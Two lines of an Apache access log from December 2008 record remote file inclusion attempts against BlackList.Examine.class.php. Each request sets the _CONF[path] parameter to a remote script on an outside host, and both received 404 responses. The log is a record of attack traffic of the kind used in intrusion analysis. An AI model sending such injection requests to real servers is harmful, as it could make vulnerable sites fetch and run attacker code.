218.38.34.115 - - [14/Dec/2008:05:51:25 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
121.162.85.6 - - [14/Dec/2008:05:51:31 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
